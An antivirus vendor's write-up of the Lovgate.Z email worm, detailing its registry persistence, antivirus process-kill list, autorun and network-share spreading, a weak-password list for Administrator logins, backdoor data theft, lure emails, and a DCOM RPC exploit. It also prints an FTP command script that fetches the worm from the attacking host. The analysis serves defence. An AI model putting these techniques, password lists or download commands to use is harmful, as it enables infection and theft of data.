Lovgate.Z

Lovgate.Z is a typical mass mailing e-mail worm, the size is 128000 bytes and the worm is compressed by ASPack and JDPack, executable runtime packers.

Note: In following text a symbolic inscription %windir% is used instead of the name of directory in which Windows operating system is installed. Of course, this may differ from installation to installation. The inscription %system% represents in following text the subdirectory System or System32 in the directory %windir%.

Installation and Autostart Techniques

Upon execution the worm copies itself into the Windows folder as “Systra.exe” and creates self-copies in the %system% folder: RAVMOND.exe and iexplore.exe. The worm also drops more components into the %system% folder: Hxdef.exe, WinHelp.exe and kernel66.dll.

Note: The worm sets the hidden, read only and system attributes to Kernel66.DLL

Lovgate.Z creates numerous copies of it's backdoor component (53,760 bytes) in the system folder:

ODBC16.DLL
MSJDBC11.DLL
MSSIGN30.DLL
LMMIB20.DLL

The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“Hardware Profile” = “%System%\hxdef.exe”

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
“Microsoft NetMeeting Associates, Inc.” = “NetMeeting.exe”

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“Program in Windows” = “%System%\IEXPLORE.EXE”

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“Protected Storage” = “RUNDLL32.EXE MSSIGN30.DLL ondll_reg”

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“VFW Encoder/Decoder Settings” = “RUNDLL32.exe MSSIGN30.DLL ondll_reg”

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“WinHelp” = “%System%\WinHelp.exe”

HKCM\Software\Microsoft\Windows\CurrentVersion\RunServices
“SystemTra” = “%Windir%\Systra.exe”

HKCUSER\Software\Microsoft\Windows NT\CurrentVersion\Windows
“run” = “RAVMOND.exe”

Note: The registry autostart entry “run” = “RAVMOND.exe” will only work on Windows NT-based systems and the worm may create

HKLM\Software\Microsoft\Windows\CurrentVersion\“ZMXLIB1”
System Services

It creates 2 system-services, named "_reg" and “Windows Management Protocol v.0 (experimental)”, both are assigned to execute "Rundll32.exe msjdbc11.dll ondll_server".

The worm terminates and stops the following services:

Symantec Antivirus Server,
Symantec Client and
Rising Realtime Monitor Service

Process Termination

The worm terminates all running processes which contain the following strings:

KV
KAV
Duba
NAV
kill
RavMon.exe
Rfw.exe
Gate
McAfee
Symantec
SkyNet
rising

Code Injection

Injects a remote thread into Taskmgr.exe or Explorer.exe. If this thread detects that the worm is not running or has been deleted, it will attempt to copy and execute itself in order to reinstall the worm.

Local Distribution (Drives)

Creates the file Autorun.inf, directly in the root folder of all the drives, except the CD-ROM drives, and copies itself as Command.com into that folder.

Note: That said, if a user opens a disk by double-clicking it's icon the worm will be executed.

The worm looks for executable files on the system and renames their file extensions to “*.ZMX”.
It then copies itself using the original EXE filename.

Creates archive files { filename } . { ext } in the root folder of all fixed harddisk drives.
{ filename } is one of the following:

WORK
setup
Important
bak
letter
pass

{ ext } is one of the following:

RAR
ZIP

This archive file contains a copy of the worm with the file name { filename } . { ext }.
{ filename } is one of the following:

WORK
setup
Important
book
email
PassWord

{ ext } is one of the following:

exe
com
pif
scr

Network Distribution (Shares)

Creates self-copies of the worm on all shared network folders, including subfolders starting from shared root folders, with a randomly named file from the following list:

“WinRAR.exe”
“Internet Explorer.bat”
“Documents and Settings.txt.exe”
“Microsoft Office.exe”
“Windows Media Player.zip.exe”
“Support Tools.exe”
“WindowsUpdate.pif”
“Cain.pif”
“MSDN.ZIP.pif”
“autoexec.bat”
“findpass.exe”
“client.exe”
“i386.exe”
“winhlp32.exe”
“xcopy.exe”
“mmc.exe”

Note: Creates a network share, "Media," which points to "%Windir%\Media."

Network Distribution (Clients)

Scans for weak passwords on all reachable network clients and tries to login as Administrator with the following passwords:

(blank password)
Guest Administrator zxcv yxcv xxx win test123 test temp123 temp sybase super
sex secret pwd pw123 Password owner oracle mypc123 mypc mypass123 mypass
love login Login Internet home godblessyou god enable database computer alpha
admin123 Admin abcd aaa 88888888 2600 2004 2003 123asd 123abc 123456789
1234567 123123 121212 11111111 110 007 00000000 000000 pass 54321 12345
password passwd server sql !@#$%^&* !@#$%^& !@#$%^ !@#$% asdfgh
asdf !@#$ 1234 111 root abc123 12345678 abcdefg abcdef abc 888888 666666
111111 admin administrator guest 654321 123456 321 123

If the worm is able to gain access via Adiminstrator Login, it drops a copy of itself as “NetManager.exe” into the ADMIN$ share under the system32 folder.

After that it starts this file as a system service named “Windows Management NetWork Service Extensions”.

FTP Server functionality

Starts an FTP server on a random port, without authentication/login. That said, this makes the compromised system accessible to anyone via FTP commands.

Backdoor Component

It executes a Backdoor routine on port 6000. The routine steals the information from the compromised system and caches the stolen data in the file, C:\Netlog.txt before the worm emails this information to the attacker.

E-mail harvesting

The worm scans all fixed disks and collects e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl, *.txt

However, these extensions are pretty much useless, because the worm has a bug regarding stringcat and compare with the WIN32_FIND_DATA results.
That said: The worm will always open and scan a file for e-mail addresses when at least one character matches one of the characters in the file extension list in the correct order. In technical terms, that means the worm compares the file extension via 'instring function/substring function'.

Example: The worm will search for e-mail addresses in files where the file extension matches *.htm, *.ht, *.h for instance.

E-mail Sender

The worm generates the sender's e-mail addresses using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

at which it adds randomly, domain names (the domain names are encrypted and stored in the worm).
It uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail subjects

Lovgate.Z selects randomly an e-mail subject out of the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
test
hi

Message Body

The e-mail contains one of the following message texts:
It's the long-awaited film version of the Broadway hit. The message sent as a binary attachment.
The message contains Unicode characters and has been sent as a binary attachment.
Mail failed. For further assistance, please contact!

Note: The worm may also send e-mails containing a blank message body or random strings.

E-mail Attachments

The worm attaches itself with a randomly constructed file name with a file extension selected from:

.exe
.scr
.pif
.cmd
.bat
.zip
.rar

Lovgate.Z – an “Answering Machine”

If the worm runs it replies to all the incoming messages when they arrive in the mailbox of MAPI-compliant email clients, such as Microsoft Outlook for instance.
The worm puts a “Re:” in front of the subject and quotes the original message body followed by {sender's domain} account auto-reply: followed by one of the following strings:

If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.

Before it adds “> Get your FREE <sender's domain>now! <” to finalize the message body.

The worm attaches itself with a randomly selected file name from the following list:

the hardcore game-.pif
Sex in Office.rm.scr
Deutsch BloodPatch!.exe
s3msong.MP3.pif
Me_nude.AVI.pif
How to Crack all gamez.exe
Macromedia Flash.scr
SETUP.EXE
Shakira.zip.exe
dreamweaver MX (crack).exe
StarWars2 - CloneAttack.rm.scr
Industry Giant II.exe
DSL Modem Uncapper.rar.exe
joke.pif
Britney spears nude.exe.txt.exe
I am For u.doc.exe

Exploiting technologies

The worm also takes advantage of the DCOM RPC vulnerability ( using TCP port 135 ) [see MS03-026] for spreading.

If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using “a” FTP-Commands file).

The “a” file contains the following ftp commands:

open %IP% %TCP port%
ftp
ftp
bin
get hxdef.exe
bye

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "hxdef.exe" from the connecting system, and starts this file after downloading.

References:
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx

Other Details

Creates and executes the file “NetMeeting.exe” (61440 bytes) in the system folder.
When the user starts NetMeeting, it does the following:

• Copies itself as “spollsv.exe” into the system folder.
• Adds the value "Shell Extension" = "%system%\spollsv.exe" to the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

PROTECT YOUR COMPUTER!
ESETs NOD32 antivirus software provides comprehensive, easy-to-use, and affordable protection from todays and tomorrows threats. We put the malware expert inside the software, so you don’t have to become one.

DOWNLOAD ESET NOD32 ANTI VIRUS SOFTWARE